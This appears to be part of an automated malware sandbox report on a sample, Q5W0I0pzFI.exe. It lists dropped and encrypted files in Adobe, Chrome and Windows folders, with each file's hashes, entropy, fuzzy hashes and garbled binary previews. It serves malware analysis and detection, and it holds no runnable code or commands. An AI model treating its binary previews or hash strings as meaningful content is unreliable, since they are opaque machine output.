Size (bytes):	632142
Entropy (8bit):	7.88701557280486
Encrypted:	false
SSDEEP:	12288:92eptVZQWeeWpmELOGJivgdrvEY2VBEN7AXlSvpqDFou:gKtHQWyoELiGEFEHvpaFou
MD5:	13964D35B83228B6A13D4911EB0A929C
SHA1:	E0480F1934A9490A0E2ABC2FEFAA6E118787F146
SHA-256:	981AAAD8AEA92A2CC730E3B56F4C1F8AF100E9EAFF7F924DEE009F61FD27B58A
SHA-512:	B3FAE31960DC25A53D4E4773DA603F1F93CC8D84FC15B92FA9B0D6219FE674F9FB74520C160AE0AD6DCC970319051B346725AF98A26087CE9409AB494CC3DC53
Malicious:	true
Reputation:	unknown
Preview:	MZ...AY...'..R. .;}..t.......\..+.......l.m.>.^.U ..:..=,.7.....9.b..A...P72w>.i..l9..xJe...9_9....R... n`.,..n...d.......Thk... .....n...Q(....l..$......E......e/...O...l.....^..c.Z........MY.w._7.J..u8.....J......P/x..e..M..@..q....t4u..!t...#I.B..t.OL......WC.i8.]f....T."o.....$"......(.": T..i....D].#..a./fn......4[..\Wk..[........U7.%=...jga?......)y.Bzh.K.. ..P........^.F..l&..q^.Q..... .N90..A..g.V=......J(B.......:.....ZK.z./~)D.....L.H.O.f.~....'..:.......Q)<........'....#.U..?+...5....K.o......Iz.k.-.......z.)....k..._.a....y....?["%8;\|..".....\|V.>..3..J....G.M9...I.....w..4../..Dt...!..7L. 8.l..w.5I....m1.._#......0.#........9.3Q\?.6o..D.....gr............eR"....E..k.B. W...../z...tclK.^......VQ./.)k...\|%.......kE...=.F.^..!Q..>............\|.].....I...H....wG...43.M.m{..t..1;...(%..&.3W...CZ.K"K....Y7.(Z.D.U....Q..,...3N.>r......h7B.T...O.!.L`.$...k..q....+1.....l...+.....pw{....pR,.^....X.K..<Z&.S..h d..j..YK..'%.`.C.b..

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1369
Entropy (8bit):	7.858093262040757
Encrypted:	false
SSDEEP:	24:ljxQLVBj3h3VoOUUrwn/F04lbAXbliy0RKd4vOEO93kAnFpECNIZkZvWFbD:LOTh3VNw/F04tAWRKd4QdVu2ZvWVD
MD5:	A7241C84E910B8B67F1A238EC88E9FB8
SHA1:	D8F125759344495071842FE038F7722071AEC231
SHA-256:	60B9DF627C528280F7E1240E269CC08562D864405594672EB4DF36B317F52969
SHA-512:	2F80FD04F531E2EA7378CBD41941A6BC2D24F6E768B9742673461B044F1BE4AFD4B06FAEFFC3357C00F1223A2E4DB84AE7C1E5FBAB0A8A36B64513DA7CF9F198
Malicious:	false
Reputation:	unknown
Preview:	%!Ado.J...J.j.Z.m.X.+....]....s........6ED.].z..F..:.;].I...^,]r.......>.,.v`.4..;/.....B...`...^.....lp,hc.....t..L..a.M..JNSy#..k.m..)SK........D...S....X.lg...US.4-.&.@..6...N.e'..e..4./.....p0+.@O.:p...v._.C...t@.>...9.............T..l.....H.._...{.T.....@.qN.......\|9....0ym..q..b.4.'......z....@..#.N..b.f.\|r.UCgg.\!.O%..h..Q/..I@&..Fo.%.W...j..*B...V.kd9e..G..h...v4..p...(?.c0Yf..KE.N.U....1..a.G+.m....Hmym..ZU.U..u...Ejl..^.G.<5._................6..8..@s.T..V.-...fr.......m~h......,.... ...%d..........kz...j.{...g@.......]..8;6)..V..:...wU..=..o......\|.=.`C..)..n..."..#......z..X..Y....g.ip..b..1#v .h..m8........o..z.(.(.. u.1.......GT/.BT.....9..@i.d2f..U.E...p.{..1.h..SX&.............oA._.v$%B]>K..TQ...G..r.......'.zT#LrI..n.8.s.h...[..g..mX..n......A....."....".01o..zY9...K.a.Xi<...J.%...6.A.."....'..M...>J....F.G]tEp:.e2Dc.q...L/.:z..a..M<...=._X...$...\|......t~L.'..^.!.A.e...2.8.........=....L0d.[.....w.V%F....]...t.p.6.

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	80722
Entropy (8bit):	7.997463079990942
Encrypted:	true
SSDEEP:	1536:O5wmGKq5myQcLMUQCnd2F0lkPpa/DpBSQOqktD9uoTr9DJhpUkhrAorkn:efGKpFcYUbdwukBODLSPqkTu89DjpU08
MD5:	AB5623D85C425D84FB200B2C939354D8
SHA1:	C4D72B281081BCF46F4B4807F81320A42D7F70DA
SHA-256:	D5D733BD03D2736B4A6DC5A0AB6270D5AD71DAA0A0A0E7F8A4EEAB21E9FC6804
SHA-512:	245C9703FBAA541BC0FDD34A848D91D4E24EE4AAAA48E2A5B931FD7C6FEB974A1D4DFD53C118869E38F1DF29FCE27A48D6BB2D7C136ACE94338838641BD540FF
Malicious:	false
Reputation:	unknown
Preview:	%!Ado.5....b..0..d...)B..U.)CF.M..?..S..Tg.......}..s....e."..v.zt...F^x..w...M......,.`t....;r..D....+\|...e"......k.D.>:.-........x!....B.W...#....N..A,(+...M+q.n.-l....9.....dGj8..G...a.!)....~...B.p...p..L..P....2t...Q8 h.'.V.xYC.=q....{y....~....+..j.5..q.....W<.;.%D......Y.....O.X/..Of.&....K.^..f.u.6.33k..:..:...w..H.vC.pg.a."./.u.)8KB5..3..\|.l'-.yr.1.9O..H...p...Z.u0..B....{.'/.l'\....,..3....6....6aD..H..I-...jmhFT.....m.x.H.\|8.3yJ.F.....................&.D..;>.....p..o..S....I..........~~.."#.B....5zL7%..k.....Df`[.?.. .....bwg.B....l......\|...2uh..........#?.....8.....L...v....8T.F.@.5o..Qe.."...myX..K.0p.4q.Q.(.k.:6.#.55.g4.].[.S+.........G...a.........A:.#n.V.M......kO.9.*vv...."...%}.(.Y.HZ..,...w....D.=!,.h@.I....l...F(p........V..".\|.....3../.j...X.H..Pf.{.L6.b.'.........1......Q6.=.8P6..I..........O.......'......U.Z2.M..-Ff....8$.Y.l9.q...'..cI.\|p.Po...Ns..T..Dc.=...y..{.}.y......h...=..Ck...Z.........#Z.

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	203027
Entropy (8bit):	7.2807706945690125
Encrypted:	false
SSDEEP:	3072:pR1rX+kSbDrz7xO+lux3E+yckAafoi6YBeOuT88rF8CP4+Q:pR1rONNO+4vycioiLBeOuT1riV
MD5:	FB7772064BBC37EB2CBCDC2780481495
SHA1:	186F86FCC5498208A84A7387E3578B4643451F95
SHA-256:	47B031347D0FD2E995CA155845050FE04E0FC755426ED1FC2BEF99E7F16D4B54
SHA-512:	10C02EE28975E3AAA7C8B720F81F5EB737349B2CFA07DB4430DB75153F837BC42551D5812B3F836B6F5D55ED2786710B386A92E77CB4E4DCD1F47413DBA9287F
Malicious:	false
Reputation:	unknown
Preview:	Adobe...Z....&.{.Q..i ....VN..l..^L^./..[...^...I....9e[..afT..R.T.O!.(.3.....0.l.<).m..`J .8C....<M.e....%._3&..........^..z.K......+.Ww...B.....=;.l...p....3.!.v......c?<?...CP'g...F..(.-.R].....UR.4.1..Cv.0.g..-.v.g....f....~C#O.!\...{.%..sCd5.h.5...3.\..($...wm.^..}.......<<.c....h..1L......oP........U:4.$(.M$^o....^xm.J...+.R.5..vF[...GDkj.w...........'..6....n.3...M.W^cO>A..K}v.........b5......t.kF.j.f..u8..XB...i.7.i.M.k..&D.g...[FL.O..9.t....!;./...vx..}d..J+........`5.3j.Hb.du...Qt..../,O..Y.q...i.S.c.H.S....maQ.......ds.0...Z<l...5....l.ik...O~.V.T.S.n...j^..R......@.bock....n.......b.1.7R:.....Q.[`.<.t.QD.P...{...7.O..3...eT.L...g...z....e..=-.....k..A....(J....\Mx_xJ......I1..x.l...}rD...R1...G}......9..d.u3.........a.L...g....~......Bl{...S)..R..Fh.d&#.._.[..5........C.HU ....?.......F.?..[W...;I..09 .:).t".f\|.rS.'.......{q.l.x.n.,..Yb.L.M.[%..!.....~....'i.....+0j.T.Z=...Ul........k...L.y.....l.....h.)....K.s.:M.......L......n

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	32987
Entropy (8bit):	7.994670699145432
Encrypted:	true
SSDEEP:	768:Qgj1yq2nJaNg5Hiq9PQXT3dN9cLLd36zLu/Pvq:7JkH5rPAThcaLUPvq
MD5:	D732185941E36BFE39378714677581AC
SHA1:	AB192CC7D732AEBFD3BD18ABFF7FB6795F2AD332
SHA-256:	BCE8B2EBC94EB1B381B512116A357B828753E001D1ADB3F5A3A19A7E7520323C
SHA-512:	7D8F7C9E644975D185CE5C1D0F20F29FC3A8491C7ABB201C6AC68A9590C06006566ADF922A0C8EC50222CAFE1C2989F9CF3BA51C7A6BE33E2EC220E44B274B6F
Malicious:	false
Reputation:	unknown
Preview:	4.191-O.o.......(...K....-F.B?..>..j.N.6H.E.......q...i..p..._..(.{....Y...D.o.T..L...K.l.......3...Y..a...#..@.et..)...^.j..K.....cqo...b6^0....n.....h..h..K...d"8..k..]...8e.8-.....9.....K.'..(B1mq.....}....>K.,..)@.-.@P..n.g..hce..5.....{.....SrN.%>..V...J..TG<.T....n/.....g..gd..T.....PB..".M...9...Y.jU6g.}E...S)r..,..E...;6.x..XW.?....M..Xe.......J....6..%-...y.z3 ...C...r.C.&=.\|j1...t<.o..&.^..M....C.;F.....{...}_...q^+..B.v5i./..:F.O.b.c....HH...z?\|Q..m.a..].....F`....6.........c..- ..?..a0........~>...@Y}..2.x...JY...P.n^,..'....?.J.......j..\...CWp..`.J.yWk...}.....o......d.j...h..ev&.-._.BB.C...X+Os..P.u.....ci....[L......c..5.......{)+.P.@-"...v......d.O.s........x\......c..R....x\....j..(..e.`.^..5a.'lx..V......JZ.4.}f.i@.....h?...X$._...N..f...Y..Ka.]..2uL..\|.*..q"..^.......z3 .t2.....#... .-..iK.n5.........&1ld.Lt.f.}\(..eJ:....M.}...W>..L....?....6..G.N?....W.\8I.p..}...$]...u....5.....o....0upP....mJ.s3=....(N

C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	932
Entropy (8bit):	7.739736680788289
Encrypted:	false
SSDEEP:	24:CxM9sT0GJl5NLphCtGxAYaQhS4dgbkaIoKvmS7Y0WFbD:Cq+PhLphuRYaKgbMvmSU0WVD
MD5:	726B9C27667BC2A0ABAF9576CEE67689
SHA1:	A70C5BFC038BFA2AC99EC650D6F0EDF91F1D16FA
SHA-256:	A7C26DDF44DC3B66F5D2B5958A9D90E08881E3B050C99DE9D922704EA8962121
SHA-512:	7BDB3A10B9B90E5DEFD452CDD174A54F6236B3FC13D434545F45FB006E2587ADACDB23DEBCBA0DF3FD628AB205FDBA5EA7F4401B8EC93E7D0346627988009908
Malicious:	false
Reputation:	unknown
Preview:	CPSA.>h...iS.N...%..... S..z.^.3.Y~EK;....].e...j...(&~r......vb.S8..}...?..4...Hj....`.L.....Dw.....iO4.;+h...9..N..T.x.....z2S.&8GZ..n.4.... \e..QJ....2.#.b.?NH#..^..j..Jb.".g...B].....CT..C....._.)Fl!.....-.a......)...V...g...F..6.... ..=Q......v..?).Hs..1.j..s{S...........S......'w......1..M.....&....Ex..j.d-9.S..V._9.Li......,...-=...+EH......>..(...!_$.d....f NS......C....._..!... +...i.d ..I.1Og....F{...e......q.i..@t.A,..\|..:.F2....]f..E6F.B%.1..m.O.d.....b/?....$...\|K..].-.Pd..k..r..?..r...a....e.....6.....".(..:N_.g?.......5....).{.....@p...........7./&k~$..O....$b.F ..._..._;..YTa<.6Z[.x....AT.{.RuP\|,.QST..f.....%e...s....:.wS]+].Z*$.....{.s......huz.:........-..I.z...;....rp..()....s.Q.X.F.......pR.......<.7.m..k=5H...M].....g.+...j.{.cGp<L.W2.. ..'.+C].....C..1....HI..p.VxbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978700696502978
Encrypted:	false
SSDEEP:	192:liwgj+Lbc1Ll3AH1b3PfrrKCUS38X2HsrMNwYCLM:EwDQR32TPfuGHs+wBLM
MD5:	5263DC321171F3D5339B22B21780CC55
SHA1:	B9B4D1B5E26CAEC235CCA7BD136BE5BE53BF33E9
SHA-256:	E69BA3E2483B987593F730BAC576F1706A63EA4565AF304A27631CC591F0D40C
SHA-512:	6B397F4810B0D5684352B9D188E11930311D2031522770BBE086807862E3D9C465079B1B850601907DC18547E822782677918ED574F2CDEABAE4F8239D94EA30
Malicious:	false
Reputation:	unknown
Preview:	......7H.gZ.#O..z5.F..]K.f......\=......7..2.S..4.....>....k8....'...g.o.....F...........2?~.e.R46..'.&.....{.O. ....N o?(..+...x.+$h4..V..(.yMO...R...bf.....\|p.\....^.-\|.o6...Q..).... .w.$..v#J..Q8}y`...5@...X.k.d.J....'.xd.h.mX.g..4.0..A.\..3._...x..Hg.....{..9.L..564b..0.y.....~G.D.............n..-.u.\|..N...9.0i.... D]....\......aB...gP...h......$U.._......C..5..3..l...6.i..L.;.y.._.0.qXlo.bo....S.^.%t.....v.U..Y.M&...5........A...C.~..Q........P.}.qV.(r.@.......u.`.At..?.Z.'n6F....)....l..Z9Q....&2.(t.:.....Tg.h..C.dn..W.......G.... \|Q..QR..x#8K.i.Rr.>.....\|O......B:..]./.O!L.4...x.v.6..C....*a...Xt)h..95q.u....4E..lp.H.;..7...-.l.$...!...'............z.;......R...6.....3..'t.6,..4..m....>....P+.<c...w;...t.<\|.....E..2.b.+.......Fd...B5....n.U.....S......#y@.@"Ymo!D.W=z......../...E.p.9.uA...FHf....X{@..43....}...P.l,...J..-..[".....F.....>.t..s.N..?..9....%%el1.28..<..x.........>..P...... ..?.\..,.4.Z.\L'.I..

C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705733225372122
Encrypted:	false
SSDEEP:	3072:y/yHdDVUImFXa+9lozn+tnniNUOglFhkpQHTgJOtbTIiFs2frN:oY2FFXJI3NjmspwTxo4PfrN
MD5:	6A4E9A2F6E1865DE5ECD89F488B3714B
SHA1:	661A26163E5C16C3D1FE453E84726440145C5C51
SHA-256:	9D3BA0FF58F24EDE62631B0F1F7F0789546AD1C372AA0BBFB9B27B2DBD1E06D1
SHA-512:	07B276AEFC57B6663B7A30085D36712982723719883F3A887BA73C8374C252A424D9606DACE1F87DFF4A1D0E8373B190761B9EA5AAAD014D499B68DEEA3FB2B0
Malicious:	false
Reputation:	unknown
Preview:	......p.T..H?!QgO ...........q...Z..5....&..jGM.....Xe.8G.. .6.~....`.~..#.~`..v....^(.N..V..(/`D.a.....D\..SK.2P?.Ur.-.5...k..8..GQ.>.'....Wh.]UU$u\|T.......W..."..........".a.up..k.'.A.Zf..n.[....Q.D.sJd;:....8.%PBe...!.....p_..G..B.l..&.\1. b.../.<<I.N..zK.......C,..9...d.a.8....`[R..5...Q.O..6..[.g1.?.J..8.T...U.. &%.fSC..9.S..E..O.l.F......p0$...t.Z..ja.......M6..!z.>...7,X@.}*"h._>.k2.....n.J....i.<..f.v......Ot0.C..2.....GL).y.Q.Q....@.?...G.r..wn.E.,l$5..9.+...^-V...>.....;...\|......[J7.I.e..:..8Q\|R?.......[+v..b$.....mR.=O.\|+....W.$.+........A..@..7.tnk..f.....E...>...L.E.. Z...Y.../..x.}..8.N..BFe.4Z.dyJ&,B..,..7c.-..s~C:..[.H..x.i;........ g..h}..).le.wg.+.vM.....b...I.4..'3..+.....UX..m/...ZT...@>........T3._...7..#Mp......fW.B.F. ..k.....q.zG.%.<Ah7.:o..}....x..b..:.[..........P...![.:...R+....u<.O.....o..Y..9K.f....R.&.0.I^`...cSUBX.[_r..VB...h.L....,J90.r^kO..(N.Q?~...g..l..p.IO7...........{@..(...I..S...9"}....ai.C.+..c...+

C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705391632389647
Encrypted:	false
SSDEEP:	6144:SR6MrfOMavWfX6R/XVxiinQ+Rzdbhl6mx2O:qzGUq1XVxJMO
MD5:	0982C3CBFF15515864D0C57081AD28D2
SHA1:	BFFB886E3A9D6E7D1B022A491A117CF651CBB3D3
SHA-256:	6FA85B112C3B73194E49EB6D064310A96B29D72B0747C90FDFA68877C047866D
SHA-512:	ACF4FA4B05FD1C30FC80CFD3016E8C94BD62A6273C1682DCA7DCE0ABB4D6E37B4F205D1671247A49C5EA407100D77543F3483E28ECECA4EBDF34021281EEC9F7
Malicious:	false
Reputation:	unknown
Preview:	.......`.....1.=...^oq...;....qi....eL..t]1..O...K...q.+.4...g..P.........;v-........Zh...{.".'...F...I....l@I...HQ..\|.5.&!u.=P..:s.S3t.....\.E..9.u?%7w.../$V.9.....0.%k....!....%..%1.3...%.z.C...dg..k..P.n...q'. 0...=.4..=.i.h..haV=GMc...r.\|.VX..(i......5......wC_.9:.....:......&..p..'............mM5l.;.`j.k.X....vL~.........M..y.../C....?.:.#..D.......4r...."......G.]..3...tL..R......Q9.].?&/F.h$0S....].Er.X!+V.....[..uf.....x+....D.l.>.F..A..y0..x.b.La..7..yo....pWe.......9...D...7...^^..p..1}....%.H..&>..?..\|..P..D/..].;......(....#..bsB..c.....%...\..U.I..(..T...-..A"9..'h.,z...y.b.../2ZF....Q>ZX...O.....5v[H...)..rC.1....@.F... ...h.=........8.d......X..".-..C.$<.....w.#[.RZS.B..@..v9....3....fY..m...h%...a....9z..._..!..N.'.O....Krh..}..~./6uI..B0>.....^.yrDwa!.....sl.p2.....z...=d..@j.$.C....(~0tO..!vr...A..-..Vu..6.%.'.....$.....'.OZWe.:.i+...p...8.;=.ywV....@u..f..bE.8.>.o..=D...k0..FK....m0./....G.t/.?y?..Y9....Z..l..Q...,.r

C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	3146062
Entropy (8bit):	0.6705186885463705
Encrypted:	false
SSDEEP:	3072:sCUSIyuUcnfnE9CmOnysrR9e9MIYcZ7lo5CMLYp8drj3:hUSv0fEDoywR9JCtW5drj3
MD5:	6B7A0B16594F49813B82DD40B1E6C695
SHA1:	FEA074026019AF7A5FD04A54AF1857EFDB70DF91
SHA-256:	FAC200A36301B00E83D61F2FDF68E554B02047DD47DF22801FFA0678000B1278
SHA-512:	CAA449074E2746138B8CE914E7F827B0BE4BB6C1376CDDD8CDE9C6A81BF624FF7754D8235D80DE071482E608615E8F36704831A8548BD742E21D3320C47227A8
Malicious:	false
Reputation:	unknown
Preview:	.......x!....WZ....J(......9"._B'<..^.B.......:..fv...@.,=..Da;..Y.C=.......?u.... ...dK..8..$$=jFs....fs......sw].p..fy.E..}$&.7$?.a-..L..~;]I...(QY...'..'..a..I..f..6.'.1.......#..r.4.'..Z..=..-...0.r9d..[.{.~.1.};W..e..e\|..fz...6.=-Q.\/.0......~I.....\.M..9..iC...P.P...I...C....6...%K...s...%."k..m..766v.6...'...u....2.....ZfU....E.B4.-c3..[%j.V{.`.8t[....Hl..fO....z.!?rGP..i..J..e.\YI.m9>s.N..b...`..~....EOg....~g....."E...4.. ..YF..9..G...0..g.E......rn}.R.......I7#8....I.......;.@!s"E.x.HC.h.li.X.........^[.....)c..gn?.f...b....f."...h..R.."&~..<....c..~...!.k']:A..ep.....9i:.##.%.\|D..6..\..G.W(.hM..]..)B.P....;.....BF.1Qy.B..dcs..>.w.i$@I.....=t[...,Z.._.K.C..[d..".....}.../.b....!y..4.?.T..4..2W.0....h.>.$....\|.%d..6.\|....U..4..Eu.:..%.s..n.._b...S.".x.!.xE........goKzZ....(......%.i...Ezb.\|..M..\|...$....rN...MhR...&e.....@..HT.Q\A.x.\...t...>..;.\....4.4..C..vc..m.z..EB..."..jY/.p..'."jy.-.^...W+(.D7..`.3$..At~]...WLu..;........X

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2323
Entropy (8bit):	7.907478192997456
Encrypted:	false
SSDEEP:	48:XxeqhAuS0AHy2hVmDhNrAOLnNeEL6V2rOZHle2CtYHHKCDIX/B8zMkHGj0ygkqXo:XxeqhAuS5S26NNUOpLKTeBCDIX/OMcaL
MD5:	BA6382AD341E3179FFE8F7436D541711
SHA1:	0A7B818954BE087629A2BBFB4AF6335B3026E363
SHA-256:	B5F59C68953319EBF8A74EEA9A82CDEA4FF118839CC595E5B87FA641911872DF
SHA-512:	280C41ADAD47282AB1271208F12531F49517430105E00D6FCB5B2C17A047912B8FD78CA8A0502EFD5763734A577148336E0FB481E4298C52C3829C2F82A0E1B4
Malicious:	false
Reputation:	unknown
Preview:	.{.....2.\|.:...o1...y.f.j)j.(...S..P.U.9....8..I..a,.K...K.........9....G.>5.,...\|...2_..k..`.5.(...xC.{.....,C...I..u.E2....yjmE..VG.D;..)G...z].}.Q.0......n......=..8C:.J.....+.W.7...i.8.p.>Z(.(..8.........@...iH.u.R....2A..[.......q...........!.+...ao.#.-... K..V6.. ......./.?7K...6p@.8.t..8..GP.~7Cy.&"8....w.....!).z...]@....."....LL.......M2......f.....%.... ......`.N.v.S.k.\|v.0....~b.....$.....J...,.+}.Q.1U..7.W.;[....-...5(`..W.....M..A.....1.?.FJF0?A]....7+...,y%^.....kK...j.Y^......T...gV..z2B!..(.vlH=z.....b.t....&..x-.9hx.c.j..h .PI..~..D.....Je.P7...uL,7Bp.K.j.M.F..%.v.^.y^iw.f....1aa4A.v...8.iR...(....5...........H..eb1+.'Zu ..;.&.rS...&..''dK...,...\|.+..h.g..G....qK....=.L.F.M..(.'u<.G+..[[..>"......'.I:.T..'<e..)..(... .~2j....Q..<..b'B........7.'i\c.2.NTv...F..."C..e..{..t.6B...)h.Qw.`}....iZ4..o&x^..yi.....5..,uY......F..........e.dJ.7...)nC.h .......k."{...@h...E..k.H..Rh@..5A..u..Ei....}...^.+...D...S.

C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.7687944203996426
Encrypted:	false
SSDEEP:	6144:g/naVKZPBHxGinO+E+tCxt5BrPkiRscnwa:g/nQapxG2nEtxZPkiec
MD5:	F1D9E59DF998FC09F2D3D5A16586178E
SHA1:	4FCB574114B8B4DDF5E67B85E73C740DC5060637
SHA-256:	BC9082BB4249C8DDED336D152E8DB4B258F26F7A79CC61553FEC4F6C2804A362
SHA-512:	B66C7CB5F74BCDCC2444940B8EB3A082B95437CA7993951FC1A1E40A0274FB03D2106433A5237FB3903629AFAB10E8E4B3972687444307E214AEB7835A4E725B
Malicious:	false
Reputation:	unknown
Preview:	...@.s4J....J.}i>,..i.5."G...<..v(..VYj..J..[..+.N.1.&.O..D..W.UK...o...t....l.]<<.<..Z..B...6..m.."o.X.MNK....3....9..H.......%?.D..9.0Tg........b...\|.S.M.$d...D7N..v.O]../.....#..........?..5qQ....;..:n.....Z9....CX....@\|@..m.;3.-N...u{.D.Y..R.M..RP.fdf...Db..3.....Mn.^G5H..J.....'Q.......1$ .\nu...>>....;..:.1...f....n@J...\|..k.R...)d.?...g..N.B.}HTF.\|YC~g..R..^....S....b..a...9...R<o...U..MZ6..q%@.Ey.>9(9b..n.....A?.e{....q.z..3=B~.C.>.u.u...N.]E<-.C...k.....W;?...:TP.C..tL~?x.<4.O.&...n)D{'B...g....3mk...(..$n.k.}g...1..O...:....K.H.=....M:._.".y.....w..........".m..."j..pp......B\|...6.g.qr.t.0.v!..&..6".v...........&.:..vq..7.8.4..G...:uET6...]+..K...\..).`...~nI..wnh+KM...Z....W....[.W.....x~..qH.G.u..K)...:........"...PBl..]+R"....2.I.}7.._.$....lu....9;..g.1v.d.]1-X/..\l..<0l.Us!j..........8...u..H..o...%.;M..Z.Prw..R?>W.-;x.#..[......!c.y.JCF.M.....~j.~....V..wY-........@.%.f$]8.. ....#.$.T.^F2x...4....~5...R...Q+.S...s{...?.xG1+.

C:\Users\user\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1048910
Entropy (8bit):	1.768923436955694
Encrypted:	false
SSDEEP:	6144:7cDvRSo6QXXOPuP2Px2aG6maQUEHLV5Mvo:7cUlI/8dxQTEvo
MD5:	A4275E1DB611AB56BF6CFA9AB425626F
SHA1:	62EA3F49CA2C2405E47CFED0C0759C4D58613829
SHA-256:	9D82097AE0D828DE939DE7546C67322B5B32DBB59BEAB551CA348F67181E2E6E
SHA-512:	4E9FA649B872C4A3DC26AB743ED5D99ABE56A19BFA86DA37068279A56FEA314BE0968DDA5F8945625C64F6C1C8CF67A2DEA2B5109C535DBDAFFAA25E545F6CA0
Malicious:	false
Reputation:	unknown
Preview:	...@....4Z..gc....2...`=S....8q.c..Zc.H..uv....(..i.aV.H..B.f...'...a..3P..."/.;w.Ro.y.....:....R.....p`>....1$...'..a.Y..$..{..6..9{..D..l...%..!.a...........d...Ah..U.&._............+../...#.).x./.@.H...U0x..T..f..w.J.~a"..{.`...."..f.U.W...u.7.g.zD.nI .v<.+..^....../.+....1.Z./.;....2@i.2........^..:..q.LZ..{]b....A..y...3....<...]o.&H7.......<...[iL.bp......k...5.u.....6.....<<Z{9r....MV.7YN..}..H.QJ'SYM.......S.1m..=@.6<.pcR\|q:.Q.>...<.T.e......vs....h...#.....{...`.%...{..l&...X1,..sT..4...#Z.....1.1?..H..1.bRY'...E]?%..._m^..M.(.h.vz#%,...x....R;../).\>..=..(.hk]......vt..pAV.RS...!...OZDWm.B^XC=.UX..XA.....P.!._...{..v...QV(...n.C.kr./..m.7.s..oX.&g.....]I+.......B...%Q......7..,.@...$........=>X....$R....m...I........f....{.7$y..:...sR.q......'......7.[....3.J.-.p.9..0.(c.<......8/#.^Y ..4...)]....Mn....i.......'.D......;.1H.\|...5)..\-....GC.c.....-.H&..m.%...._R.+......... ...Thbp.w.1...6.'...?..f.TU.)A.^..Om..N4l...~.-.!.~ .....bj...RN.P

C:\Users\user\AppData\Local\IconCache.db

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	16679
Entropy (8bit):	7.988902051714758
Encrypted:	false
SSDEEP:	384:JT71S+ZE6r97dFn+H8FM8vsRYUJ1W3EdDRu4:dhS+TRF+H8FM84nJSKDRx
MD5:	02A47D70577B9FC75B5E1012FB59EA04
SHA1:	67F6CDD5207BE73192C0E76382684F29FB6AF975
SHA-256:	B6BB0FA158264A3D1498FFE9DF57EAFC84B0B2B4226FE14017AD6BF5BBE7C93E
SHA-512:	E644B9F5FC652097A6EA284721DB0FD5BD9DE25D42902C002DA927722F350A7B97E8CD98ACE678676328D445A01F4D0B5C8F488D1766478D886D0AC95DECFEBF
Malicious:	false
Reputation:	unknown
Preview:	H...W:Y.`.ZI......y)EB.\|..j...I.5..Q.FFf)s.[)G.6.../<9.......d.j`...J.....&...+S.c."V.t...x......qv..[.........->a.w.n.I0gM:Q.....gyt.].....M....q.P../..:..hE5.....sH.I.S.k..;a.....b@.I.jV#@..Kh..=....9s..7.e.....m7.......K..7x..;v...oQ....xK.=;....Z............T..l..\..m..sUh.....4...I1..Z.mG.._..^.w{@......"]%^_...T.v...u.t.....B&.)..?.-l.N...KN...$.U"....MI.....-...T...D.[. .(g........3...Bw./.g.T....b..r ...E?&.~..B......8.X...=.....N...4..?I...w..~!P...../.:f....=.1_..o.L....}.MR.tc.U..(R..6!..v].L..j.4z9...Y...2SX...h....Ii.p.....O:...y..H....yT......X.U...C.f.1]......."L..e".....GEQ.Nm..5.'don<..{N..,.%.l.....q..{\#=...!f.LO...K0."d_..5...p\+XC.:....x+>.k..o....4.IT.R_a....9\|u.QNZ.J...C<.........;...a........_e.2c......l.m..(....x......6).1......oW...)T........"...3XRJJ.H......eN3.Th.#4F..>=\|v$q.z.e.-1C....K....y".....,..z.,.4..~+X...#$.-.R.9.v......L.ltz...............Z.\..W..eP+.=}.......(:...s..D...O.g...H..F_..F.^LSy..'.

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	722
Entropy (8bit):	7.714750874446455
Encrypted:	false
SSDEEP:	12:QM+pVI1s+koC8uYY5B876fIWSjsSPTWoK/NvACv2luoPcjeZhD8LvXchWg35Mtw9:Sr+koC8uYogMRSTWJCCulyKzD87sWTy9
MD5:	2706405652998AE3D027759091CCC55B
SHA1:	29C90F6A322D43A6DDFDD448C25342940A4F3B66
